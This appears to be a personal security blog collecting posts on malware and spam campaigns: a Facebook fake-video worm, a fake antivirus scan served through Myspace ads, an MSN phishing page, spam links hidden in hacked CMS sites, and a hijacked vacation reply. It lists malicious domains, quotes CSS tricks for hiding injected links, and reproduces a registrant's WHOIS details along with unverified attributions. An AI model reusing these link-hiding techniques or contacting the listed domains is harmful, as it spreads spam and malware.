Yesterday and today I’ve been busy mopping up the aftermath of two people on my friends list spreading the fake videos on Facebook.

One of these friends had over 1400 hundred friends. The hacker used her account to send fake videos by FB mail to friends of her friends (I received nothing).

When another of my friends started sending out massive amounts of infected FB mails and posted fake videos to our walls, the shit hit the fan.

Somebody in their wisdom discerned that the other friend was the hacker, and there was a lynch mob forming. I realized what was happening, and rebuked them. I also contacted the woman in question. Poor thing was terrified, because people had been posting stuff on her wall all day.

So as you can imagine, I was one busy bee, posting about this, warning people etc.

Then, Facebook disables my account, but leaves the ones infected be!!!!!

I have more than one computer, and more than one IP number (different providers). That combined with the fact that I warned people about the fake videos, and was very active today, tripped something at Facebook.

I’m pretty pissed off, understandably.

Anyway - for advanced users out there - don’t have more than one computer logged in to Facebook at the same time, on different net providers. It could SOOO easily happen for more than me. THAT’s what triggers getting suspended, not actually being infected!

I just accessed a Myspace profile, and after a second or so, a fake malware scan started. The scan was launched from mednetsafety.com. When looking in my history, I see the page was titled SoftCop - Online Protection. This thing eventually tries to drop a setup.exe file.

Scary.. And the scariest was that this was launched from Myspace, so they’ve gotten a bad guy into their ad network.

I don’t see any info on that site and malware, so this might be rather new.

Question is, was the site hacked, or was it set up by bad guys.

Hmm, registered by someone in London - apparently non existent address, with a non-British sounding name, and the registrar is nic.ru. The domain was just registered a few days ago.

In the page loaded, there’s a reference to typesords.com, owned by the same person a few days ago.

Good enough for me, this looks like a bad guy, though probably not a real name:

Contact Name:            Johnny Dakaskas
Contact Organization:    Johnny Dakaskas
Contact Street1:         Sunstayn’s Rd 11
Contact City:            London
Contact State:           London
Contact Postal Code:     31032
Contact Country:         GB
Contact Phone:           +44 118 95034543
Contact Fax:             +44 118 95034543
Contact E-mail:          johnny.dakaskas@gmail.com

According to MalwareURL, Johnny Dakaskas has a group of domains, and most of them are dropping FakeSmoke Trojan.

First I noticed a friend had added a video to my wall. It didn’t look like his usual stuff - being Scandinavian, he rarely posts in English, and he wouldn’t use slang. So I thought, hmmm…

Of course, I should have noticed that there was no play button on there, but that could have been faked too, so that’s no guarantee!

Next I notice this status update on his profile:

Got a video in my inbox called “Woww! Is thaat reallyy you in that viideo?” Do not click on it. It is a computer virus. And it does not come from me.

I told him immediately that he could track where that “video” had been posted by following the small links on his profile, and he could remove them from other people’s profiles, since “he” had posted them. I suggest others do that as well, if it happens to you!

Then I check the code on the page. There’s a script that’s too convoluted I don’t bother figuring it out (and my antivirus blocks the page as dangerous anyway), but I did note this:

I do however notice a list of IP numbers in the next table, just slightly obfuscated. One of those gives me (in a text browser) a page that includes the words:  Video | Facebook. And there’s also a file: setup.exe which is loaded on document.onclick and document.onkeydown

I also notice an address that seems to be loaded when you leave the page, going to an affiliate id 02979 at mexcleaner.in. That page includes this sentence:

Your computer is stongly infected by viruses! ‘ It can cause data loss and file damages and need to be cured as soon as possible

It then gives a bogus list of infections, along with a solution:

Affiliate ID 02979 at downloadmasters.org

A report on Siteadvisor from two days ago implicates that site as directing to Trojan.

———-

Update: Similar messages as used with these fake videos are known for a while on Twitter, and back then it was the Koobface trojan that was pushed. Here’s what Kee Heritage has to say about this.

A friend who got stung by this said she never clicked on any fake video, so she doesn’t understand how she got it. She has Panda antivirus on her computer, and the scan came up empty. TrendMicro however tends to block most of the pages used in this attack.

Update October 30:

From what I’ve seen of the fake videos, this TrendMicro writeup about Koobface looks very familiar - the addresses last used were blogspot addresses.

————

Sorry I’ve been incommunicado for so long. I figured I’d shift this blog over to the stuff I’m blogging about here, and so far this was the first thing that really got me going enough to divert from all the other stuff I’m doing. Sorry..

I’ve had three messages from friends on MSN the last two days that weren’t actually from them. They were all Norwegian nationals, and were unlikely to write to me in English. And they certainly were unlikely to “cold call” links to dodgy sites.

Most likely there’s a form of MSN worm making the rounds in Norway right now.

Hmmm, combination worm/phish, it appears…

I checked the latest URL with a text browser, and there was a redirect to a page with the title:
MSN anti-Block Checker is now FREE!

The page then says:
Your Contact List is Searcing now…
Please Wait!

And then an alert:
Congratulations! Your MSN Contact List is clear! Nobody has blocked you

I also found this:
Please fill MSN Account and Password fields

UPDATE:
Oh dear (as Miss Marple would say, she was just on TV).

Another link I received led to a 302 redirect and then to an exe file. I’ve got it saved on a unix server, if anyone’s interested in examining it.

The third link went to a spammy page on weightloss pills.

Spammers appear to have set their sights on Facebook for spamming purposes. But since outgoing links have rel nofollow, it’s no good for Googlejuice. So let’s examine an actual example of a group set up for spam purposes:

http://www.facebook.com/group.php?gid=56828903531

It’s a group touting something called ProfileLock. Problem is, there’s no such thing. It’s just a clever second attempt at hawking wares (in this case, it’s a SEO firm).

The website associated with the group is called GoogleMarketing101.com. Normally variations on Google are not owned by Google, so I checked. The address was in Florida, in an area where spammers abound. I checked the name, the address and the domain name. The owner has talked about Facebook and SEO before. And he’s also made a Facebook group before, only it didn’t do so well: http://www.facebook.com/pages/Google-Marketing-101/46023747363

So what does he do? He capitalizes on the paranoia of people who have lost their profiles before due to some infraction or other. And the guy who sent the invitation to me DID lose his profile once. THAT’s where viral comes into the picture. People are gullible, and join because they have a need. What they don’t realize is that this is just a ploy to get people to click on the link, which is what it’s actually about.

This particular group promises that if you post the name on your Facebook profile along with your ID number, you will lock it in. It’s a scam. That group is very likely to disappear. You’re better off saving that data on your computer somewhere.

I’m sure Joel wouldn’t consider himself a spammer. After all, he doesn’t send out invitations to this group himself, he tricks his friends into doing it. Yes, I have a friend in common with this guy. So I’m not so much saying he’s a spammer as I’m saying this group is a scam, and I’m lumping the attempt in with other stuff I see on the web that I consider “spammy”.

These are the least likely to be spotted hackings I’ve ever seen.

Andrew Jensen commented on a post, leaving this case story of a Dot Net Nuke hacking.

I checked into some sites that had been hacked, and here’s what I found (and do read his post first):

One one site, the hacked links were inserted into the links at the very top, a div class named headerlinks. The hacked links were placed
top: -1500px; position: absolute
and
z-index: -2; position: absolute

On another site the links were placed prior to the main column.

It seems these links may be individually or randomly placed on the page. And the position (outside the browser window) also appears to be random.

I also found one hacked link that was placed differently:
position: absolute; left: 0px; bottom: 0px; font-size: 0.5em

That same site appeared to have a second, earlier hacking right above, with this code:
div style=”display: none

One sight seemed to proudly display the links, as Sponsors, while another touted the site in a blog post. A third had a small text link under the Google Ad block.

Here are the links I found apparently hacked into Dot Net Nuke installations. They may not all have been inserted by the same hacker:

filespie.com
movie2b.com
qarea.com
gigsofmp3.com
zmovielibrary.com
allgenresmusic.com
mp3filesdirectory.com

Update: qarea.com is affiliated with bughuntress.com, which has no shady links. We of course don’t know if they’ve paid for the hacking, or if someone included their site anyway.

I came across a hacked site today. Turns out it was based on an older version of Joomla. That MIGHT be where the hackers got in, but not necessarily. I checked on that site a few weeks ago (there’s actually still a Google cache from back then, Jan 20, 2009), and back then I first thought something was wrong with the software, and then eventually found that the database server was down. I hadn’t been back until today.

(name of site removed) is a website belonging to a guy who writes books and articles on stalking, cyberstalking, bullying and online security. These days I don’t normally include the name of the sites that have been hacked, but this time I couldn’t resist. The security guy got hacked (OK, he says he’s not a security guy, I just thought it sounded good…). I’m sure this will be fodder for a great new article from the security guy!

He’s got lots of pages visible in Google from when the site was operational (as late as February 22, 2009). But now all those pages redirect to the root page. If you check index.html, you get a normal 404 error page, but index.php is a hacked 404 error page, that contains the hacked code.

The code is unescaped text using eval. It’s an iframe pointing to a Russian site. I never got so far as to see what was there, because my anti-virus dislikes the code. The source code on the page complains that the template file can’t be found. These hacks quite often pull in the code dynamically from a different website, so the code you see when you access the website might not be what’s hidden in the hacked site (in other words, finding the hacked code isn’t easy - better remove everything and reupload from your computer). And the exploit itself (usually a file that will infect a visiting computer) might be on a third site.

Here’s an image containing (first part) the code I found on the page, prior to the unescaped string, and (last part) what that string decoded to.

This hack has been mentioned online as early as 2007, and a year ago, and it’s been mentioned as serving malware, but this site was recently hacked, as far as I know.  According to others who had that happen, the hack was done through php scripts uploaded by clients. I checked other domains currently on the same server, and they do not appear to be affected.

Here’s an analysis of who is behind this (Nov 2007)

There’s a guy in my “network” who keeps on joining one network after another. And he always sends me invitations. They go straight in the “half spam” bucket.

The latest invitation piqued my curiosity. It was from mydailyflog.com, and it said:

Hi!
I would like to invite you to visit MyDailyFlog and see my latest photos.

And then the link, which was on this format:

http://www.mydailyflog.com/go/invite_register/randomusername/somenumber

Hmm, this doesn’t look to me like the link to a post with his latest photos? Because if he was sending me an invitation to view his latest photos, I’d be inclined to go check them out. But invite_register? That sounds awfully like fanbox behavior. How do I know they won’t create a profile for me just from that link? I had to test it, but not with my own e-mail address - I don’t want to encourage them to keep spamming me, so I find a random invitation in Google (yes I know, it’s ethically questionable, but Google has followed a bunch of those already, so…).

And yes, they have the e-mail address filled out, and are just waiting for my password.

Oh, and he has no photos at all yet, so this wasn’t a specific invitation to me, which I wouldn’t mind - for specific photos he manually invited me to see, but an attempt to get me to sign up.

I also checked the Terms of Service, and they state among other things that:

…You are solely responsible for any use of or action taken under your password on the Site. Your password may be used only to post Posted Content, review information regarding potential and completed transactions and otherwise access and use the Site and Services in accordance with these Terms and Conditions…. …You accept full responsibility for all transactions and other activity placed or conducted through your account and agree to and hereby release MyDailyFlog from any and all liability concerning such transactions or activity….

There’s just one problem with that… The e-mail I received was not sent by my friend, but by the dailyflog system - which means he either expressly gave them my address, or gave them access to his address book, presumably by giving them his webmail password.

So… Dailyflog sends out invitations, and you’re responsible. Now, why does that sound familiar?

Update: Very funny, I now got an invitation with a link identical to the one I put into this blog post. Serves me right for including the number at the end, which was identical to the number on the first invitation I got. So it’s possible that the number identifies a specific e-mail address regardless of who the “inviter” is?

I’ve sent out a few newsletters recently, and got one reply that raised my suspicions. It was a vacation reply that hawked a website, and it looked like spam. Although I don’t know the person who owns the e-mail address, I suspect she was hacked, and somebody turned on her vacation response and filled it with their spam.

hi:
Heya, how are you doing recently ? I would like to introduce you a very good company which I knew. Their company homepage is www.sugefa.com. They can offer you all kinds of electronical products which you need, such as motorcycles, laptops, mobile phones, digial cameras, TV LCD,xbox, ps3, gps, MP3/4, etc. Please take some time to have a look at it, there must be something you ‘d like to purchase.
Their contact email: sugefa@188.com.
MSN: sugefa@hotmail.com
TEL: +8610-80973507
Hope you have a good mood in shopping from their company!
Regards

I’ve found the same sentences on the net, on a blog that seems to use e-mail to post. The owner probably didn’t send some of those posts from September and October.

Here’s a report on this spammer/hacker.

If you see a vacation response like this, please notify the person it came from, maybe via Facebook or another address as well if you can. They’re usually so mortified they got hacked, so they might not reply to you, unfortunately. Getting hacked is no longer something to be ashamed of. There are so many ways they hack people, you’ll have to be VERY good with computers and very lucky to avoid ever being hacked.

More people talking about this phenomenon:

Computerhope
taint.org

Estdomains, home to lots of spam domains, is now history. Good riddance!